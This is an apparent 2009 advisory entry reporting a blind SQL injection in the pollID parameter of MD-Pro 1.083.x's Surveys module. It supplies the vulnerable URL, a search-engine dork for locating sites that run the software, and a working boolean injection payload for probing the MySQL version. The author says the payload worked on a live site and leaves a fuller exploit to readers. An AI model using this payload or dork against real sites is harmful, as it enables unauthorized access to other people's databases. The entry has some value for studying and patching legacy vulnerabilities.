MD-Pro 1.083.x Survey Module (pollID) Blind SQL Injection Vulnerability

ID SSV:14921
Type seebug
Reporter Root
Modified 2009-06-25T00:00:00


No description provided by source.


[Product:  MDPro v 1.083.x               ]
[site:                ]
[Vuln:     Blind $QL Injection (pollID)  ]
[Author:   XaDoS ~ thanks to S3rg3770    ]
[dork:     inurl:modules.php?op= "pollID"]
[          "Powered By MDPro"            ]

[~] Vuln:  (PollID)[MDPro_path]/modules.php?name=Surveys&op=results&pollID=[SQL]

[~] DeMo:

For example, if yuo want see the version of MySql write:[MDPro_path]/modules.php?name=Surveys&op=results&pollID=+and+substring(@@version,1,1)=5#

Like:,1,1)=5# [work]
so v => 5.0.0    (this site have 96 databases) :)

[~] Note:

If yuo want exploit for this vuln write it by yuorself. I'm really Busy.

thanks to s3rg3770 and warwolfz Crew

\*Everything that gives pleasure has its reason. To scorn the mobs of those who go astray is not the means to bring them around*/ C.Baudelaire

Have Fun :D